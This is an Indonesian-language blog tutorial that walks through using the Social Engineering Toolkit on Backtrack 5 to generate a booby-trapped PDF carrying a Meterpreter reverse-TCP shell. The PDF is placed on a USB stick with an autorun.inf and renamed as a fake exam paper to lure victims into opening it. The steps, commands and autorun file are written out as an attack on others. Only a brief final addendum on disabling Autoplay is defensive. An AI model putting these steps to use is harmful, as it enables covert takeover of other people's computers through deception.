Hacking USB + Social Engineering Toolkit

Hacking Menggunakan USB + Social Engineering Toolkitv4L



diketahui bahwa akhir-akhir ini USB benar-benar amat sangat populer penggunaannya disemua kalangan masyarakat

apakah mungkin melakukan serangan terhadap komputer lainnya hanya dengan menggunakan USB ???

jawabannya lihat langkah-langkah berikut dibawah ini :


Tools yang digunakan : SET(Social Engineering Toolkit)

O.S yang digunakan : Backtrack 5

Victim O.S : Windows XP SP3 (fungsi autorun = on)


Persiapan :

1. SET
2. O.S(saya pake backtrack 5 yang udah include di dalemnya semua toolsnya)


Keterangan :

Tulisan Berwarna Merah = command line


Langkah-langkahnya :

1. Buka console backtrack (CTRL+ALT+T) lalu masuk ke folder /pentest/exploits/set.
cd /pentest/exploits/set

2. Jalankan Social Engineering Toolkit dengan perintah ./set




3. Pilih Nomor 3 "Infectious File Generator"
lalu pilih nomor 1 "File Format Exploit"
selanjutnya masukkan IP address penyerang(komputer kita)




4. Pilih format exploit yang hendak digunakan...disini saya gunakan menggunakan "Adobe PDF Embedded EXE social engineering"

5. Langkah berikutnya yaitu memilih file PDF yang akan digunakan untuk menyerang




6. Langkah berikutnya adalah memilih payload atau apa yang ingin kita dapat dari korban jika ia meng-klik exploit yang kita buat. Disini saya memilih nomor 2 "Windows Meterpreter Reverse_TCP shell"

7. Berikutnya adalah melakukan setting connect back, maksudnya adalah ketika exploit berhasil dijalankan, pada port berapakah kita akan menangkap koneksi tersebut ???
disini saya gunakan port 80




8. Ketika muncul pertanyaan Do you want to create a listener right now ??? [yes|no]" pilih YES

9. Semua file yang berhasil digenerate oleh SET tersimpan pada folder /pentest/exploits/set/autorun

tetapi nama file tersebut agak mencurigakan & kurang menarik sehingga lebih baik jika kita rubah terlebih dahulu penamaan file tersebut
masuk ke folder autorun :

cd /pentest/exploits/set/autorun

10. Lakukan perintah ini :

pico autorun.inf

11. Didalam file autorun.inf, rubah template.pdf menjadi nama file yang menarik agar korban mau membuka file tersebut
Berikut adalah isi autorun.inf yang saya buat :

[autorun]
open=Soal_UAS_2011_Aljabar.pdf
icon=autorun.ico
Lalu tekan CTRL + O untuk melakukan SAVE dan CTRL + X untuk keluar

12. Langkah selanjutnya adalah menamai template.pdf menjadi nama yang telah kita definisikan pada autorun.inf dengan perintah mv

mv template.pdf Soal_UAS_2011_Aljabar.pdf

13. Selesai sudah, selanjutnya tinggal meng-copy kan semua file yang ada dalam folder autorun tersebut ke dalam USB anda

14. Ketika victim mencolokkan USB dan autorun komputernya dalam keadaan aktif, maka ia akan otomatis membuka file PDF yang tadi telah kita buat

15. Ketika ia meng-klik OK untuk setiap alert yang muncul, maka :




Tambahan:

1.     Jalankan membuka Tasks (Klik di sini untuk melihat shortcut untuk meluncurkan Run)
2.    Ketik: gpedit.msc (case sensitive)
3.    Menelusuri ke Computer Configuration -> Administrative Templates -> Windows Components -> Autoplay Kebijakan -> Double klik Matikan Autoplay pada jendela sisi kanan
4.    Ada 3 konfigurasi yang tersedia: Tidak Dikonfigurasi, Diaktifkan, cacat
5.    Pilih Diaktifkan kemudian klik menerapkan


Butuh Kesabaran & Ketelitian
Untuk Melakukan Segala Hal !!!!
Good luck…